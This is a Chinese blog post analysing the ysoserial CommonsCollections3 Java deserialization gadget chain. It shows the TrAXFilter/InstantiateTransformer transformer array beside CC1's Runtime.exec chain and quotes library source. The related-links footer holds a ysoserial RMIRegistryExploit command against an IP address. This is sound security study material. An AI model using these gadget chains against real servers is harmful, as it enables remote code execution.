ysoserial-cc3 java反序列化

最新推荐文章于 2024-08-08 22:50:50 发布
最新推荐文章于 2024-08-08 22:50:50 发布
阅读量210 收藏
点赞数
分类专栏: yso java 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/springgold/article/details/120068513
版权
java 同时被 2 个专栏收录
6 篇文章 0 订阅
订阅专栏
yso
5 篇文章 0 订阅
订阅专栏
ysoserial-cc3 java反序列化
1.从入口看

1)cc1与2的 结合
在这里插入图片描述
2)Transformer链如下,使用了TrAXFilter类

		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(TrAXFilter.class),
				new InstantiateTransformer(
						new Class[] { Templates.class },
						new Object[] { templatesImpl } )};

3)根据cc1 触发会进入LazyMap的get方法
在这里插入图片描述
4) 触发 Object value = this.factory.transform(key);
对比cc1
会去实例化InvokerTransformer对象,完成调用

	final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String.class }, execArgs),
				new ConstantTransformer(1) };

cc3 没有使用InvokerTransformer类,此处使用 TrAXFilter 和 InstantiateTransformer 类

		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(TrAXFilter.class),
				new InstantiateTransformer(
						new Class[] { Templates.class },
						new Object[] { templatesImpl } )};

InstantiateTransformer 的transform方法,获取构造方法后对类进行实例化

  public Object transform(Object input) {
        try {
            if (!(input instanceof Class)) {
                throw new FunctorException("InstantiateTransformer: Input object was not an instanceof Class, it was a " + (input == null ? "null object" : input.getClass().getName()));
            } else {
                Constructor con = ((Class)input).getConstructor(this.iParamTypes); 获取构造器
                return con.newInstance(this.iArgs); 实例化类TransformerImpl赋值
            }

TrAXFilter 类
关键: _transformer = (TransformerImpl) templates.newTransformer();
TransformerImpl 类, 后面与CC2 的调用一致

  public TrAXFilter(Templates templates)  throws
        TransformerConfigurationException
    {
        _templates = templates;
        _transformer = (TransformerImpl) templates.newTransformer();
        _transformerHandler = new TransformerHandlerImpl(_transformer);
        _useServicesMechanism = _transformer.useServicesMechnism();
    }
mtysh1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java安全(六)java反序列化2,ysoserial调试
weixin_45694388的博客
04-19 3838
ysoserial 下载地址:https://github.com/angelwhu/ysoserial ysoserial可以让⽤户根据⾃⼰选择的利⽤,⽣成反序列化利⽤数据,通过将这些数据发送给⽬标,从⽽执⾏⽤户预先定义的命令。 什么是利⽤? 利⽤也叫“gadget chains”,我们通常称为gadget。如果你学过PHP反序列化漏洞,那么就可以将gadget理解为⼀种⽅法,它连接的是从触发位置开始到执⾏命令的位置结束,在PHP⾥可能 是 __desctruct 到 eval ;如果你没学过其他语
Java反序列化ysoserial URLDNS模块分析
javajavajava
11-19 1187
前言 Java反序列化漏洞 利用时,总会使用到ysoserial这款工具,安服仔用了很多,但是工具的原理却依旧不清不楚,当了这么久的脚本仔,是时候当一波(实习)研究仔,学习下这款工具各个Payload的原理了,下面我们先从漏洞探测模块URLDNS这个Payload开始学起,逐步衍生到漏洞利用模块。 为什么URLDNS模块会发送DNSLOG请求? 分析 下载ysoserial项目,打开pom.xml,程序入口在ysoserial.GeneratePayload 打开GeneratePayloa.
[Java反序列化]CommonsCollections3利用学习
feng的博客
08-18 683
前言 开始CC3的学习,学完这个之后就暂时不再看Java反序列化了,先去把JavaWeb给补一下,可能需要1-2个月的时间。再过2个星期开学了还要忙考试的事情,还有课程,还有很多的事情,到时候会更忙,只能趁着现在能多学一点是一点了。 所以其实CC的学习也并不完全,commons-collections4.0的代表CC2还没有学,不过也不会咕太久,可能接下来哪天JavaWeb学烦了就来看看CC2解解压也是有可能的。 分析 跟着P神的文章学习很大的好处就是可以很明显的感觉到思考的过程,整个学习的路线是以
commons-collections3(cc3)反序列化分析
遇事不决冲冲冲
03-10 2538
commons-collections3反序列化 cc3cc1想法还是很相似的,然后构造恶意类和调用使用了不同的两个新类 ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke()
java反序列化cc3分析
m0_64815693的博客
05-05 1492
java反序列化cc3分析
【渗透测试笔记】之【拒绝服务攻击】_拒绝服务攻击的代码(1)
2401_84971562的博客
05-13 356
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Java安全--CC3
qq_64201116的博客
12-11 1004
如图所示的defineClass在寻找用法时有一个com.sun.org.apache.xalan.internal.xsltc.trax包下面调用了这个重载方法,并且类型的default。这里判断完byte之后对_tfactory进行了方法的调用,所以这里需要对_tfactory进行赋值,否则这里会报空指针报错。是一个transient类型,值为空的东西。发现报错了,还是报了空指针的错误。我们调试发现报错的点在_auxClasses调用put这里,因为_auxClasses为空,所以报了空指针错误。
ysoserial-1.35(exe).zip
09-11
ysoserial.net工具构造恶意序列化数据,一种概念证明工具,用于生成利用不安全的 .NET 对象反序列化的有效负载。。ysoserial.net 是在常见的 .NET 库中发现的实用程序和面向属性的编程“小工具”的集合,这些库...
java反序列化 ysoserial|ysoserial-master-ff59523eb6-1.jar
12-10
帮助理解java反序列化漏洞的工具,一般还需配套工具:SerializationDumper-v1.13、DeserLab以及抓包分析工具
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
反序列化测试工具 ysoserial-master-v0.0.5 打包
05-21
用法 java -cp ysoserial-master-v0.0.5 ysoserial.exploit.RMIRegistryExploit 192.168.192.118 1099 CommonsCollections1 "notepad.exe
Java代码审计——Commons Collections3 TrAXFilter
王嘟嘟的博客
12-01 1194
0x00 前言 反序列化总纲 TrAXFilter是cc3中的迭代前夕,主要是为了可以准确的启动newTransformer 0x01 TrAXFilter 首先来看TrAXFilter的构造方法。 相当于是创建了TrAXFilter,只要实例化了之后就会直接触发newTransformer。 那么其实就不用通过InvokerTransformer直接去进行反射了。 这里是需要进行实例化即可,不需要使用其他方法,所以不使用InvokerTransformer而是InstantiateTransforme
Java反序列化漏洞——CommonsCollections3分析
Thunderclap的博客
02-17 895
CC1中我们是通过调用Runtime.getRuntime.exec()来执行系统命令,而另一个方向我们可以通过TemplatesImpl加载字节码的类,通过调⽤其newTransformer() 方法,即可执⾏这段字节码的类构造器,我们在类构造器中加入恶意代码,即可执行任意命令。利⽤InstantiateTransformer 来调⽤到TrAXFilter 的构造⽅法,再利⽤其构造⽅法⾥的templates.newTransformer() 调⽤到TemplatesImpl ⾥的字节码。
Java安全学习笔记--基于ysoserial反序列化利用工具CC2和CC5构造方式的思考
m0_64685672的博客
02-02 2536
前言:ysoserial反序列化利用工具的CC5CC6的利用核心都还是LazyMap+ChainedTransformer,两条利用通过TideMapEntry的toString和hashCode方法来触发核心利用,最终触发get方法 把三个方法放一块 public V getValue() { return this.map.get(this.key);//这里的this.map就是我们的LazyMap } //LazyMap的get方法: public V get(Object
Java反序列化 CC3 TransformedMap利用与LazyMap利用记录
LTianHang的博客
02-07 163
Java反序列化 CC3 TransformedMap利用与LazyMap利用记录
Java反序列化-CC3
cike_y
04-22 485
CC3笔记。CC3通过字节码文件,动态类加载来进行命令执行,达到绕过服务器的黑名单的一条
Javaweb安全——反序列化漏洞-CC3
weixin_43610673的博客
07-06 965
CommonsCollections3是为了绕过一些规则对InvokerTransformer的限制而产生的,因为在CommonsCollections1中我们为了动态调用方法需要使InvokerTransformer这个类完成回调,被加入黑名单的话就切断了CommonsCollections1的利用。上一篇文章的TemplatesImpl动态加载字节码刚好就有用武之地了,将原来的回调替换掉变成直接加载字节码。先来看一个demo: 由CommonsCollections1 AnnotationInvoc
javaweb)请求响应postman
最新发布
2301_79144798的博客
08-08 534
1.Tomcat又称为servlet容器前端浏览器发起请求携带http请求数据,web服务器负责请求协议的解析,Tomcat接收请求数据,并对请求数据进行解析。Tomcat将解析后所有的信息封装到一个对象当中:HttpServletRequest(请求对象)---应用程序从中获取请求数据。HttpServletResponse--通过这个对象设置要响应的数据 --响应信息给浏览器浏览器--服务器::BS架构(通过浏览器能访问到的网站:京东 淘宝 天猫 唯品会都是BS架构)
Java对象序列化与反序列化规范详解
"serial-spec[1].pdf 是一份关于Java对象序列化和反序列化的规范文档,主要面向中高级开发人员,旨在详细阐述如何在Java系统中将对象转化为可存储或传输的序列化形式,以及如何从序列化数据恢复原始对象。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值